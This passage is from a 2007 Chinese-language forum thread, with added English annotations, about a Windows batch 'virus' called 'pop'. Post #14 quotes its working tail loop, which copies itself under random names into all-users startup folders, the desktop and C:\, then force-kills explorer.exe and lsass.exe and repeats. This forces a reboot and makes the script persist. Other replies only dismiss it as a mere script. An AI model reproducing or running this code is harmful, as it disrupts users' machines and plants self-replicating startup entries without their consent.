:: (the annotator reads this as harassment and as re-creating the startup
:: copies faster than they can be removed; killing lsass.exe normally forces a
:: restart by itself). The Desktop path still uses the German
:: "Dokumente und Einstellungen" form.
:: pop by pop
:: The line above is the author's own comment - a signature of sorts, as the annotator notes.
2007-1-21 09:28 |
PPdos
『第 8 楼』:
单从感染计算机的角度讲 这个脚本也只能称之为脚本了
2007-1-22 15:21 |
qiuqiansuo
2007-1-23 00:54 |
ec2049
2007-1-23 02:42 |
rcbblgy
『第 11 楼』:
二楼的批处理编写水平和我差不多,汗……
2007-1-23 07:02 |
zerocq
『第 12 楼』:
这只能算脚本吧,病毒传染的代码都没看见
还想研究一下批处理的传染捏
2007-1-24 05:35 |
htysm
『第 13 楼』:
二楼的代码也太.......^o^
2007-1-25 04:50 |
KKIILDL
『第 14 楼』:
:bombing
:: Tail loop of the "pop" sample (post #1, cleaned up in post #7), quoted here
:: by the poster as the "replication" part. It keeps dropping random-named
:: copies of itself into the All Users Start Menu/Startup folders, the
:: current user's Desktop and C:\ until the pending shutdown fires. Only local
:: copies are made - nothing in this loop spreads over the network.
chcp 1252 > nul
copy %0 "C:\Documents and Settings\All Users\Start Menu\Programs\Autostart\%random%.bat" > nul
copy %0 "C:\Documents and Settings\All Users\Start Menu\Programs\%random%.bat" > nul
copy %0 "C:\Documents and Settings\All Users\Start Menu\%random%.bat" > nul
copy %0 "C:\Dokumente und Einstellungen\%USERNAME%\Desktop\%random%.bat" > nul
copy %0 "C:\%random%.bat" > nul
:: Killing explorer.exe removes the desktop/taskbar; killing lsass.exe normally
:: forces Windows to restart on its own, which is the real disruption here.
taskkill /f /im explorer.exe > nul
taskkill /f /im lsass.exe > nul
goto bombing
这段应是随机繁殖。
2007-3-1 01:08 |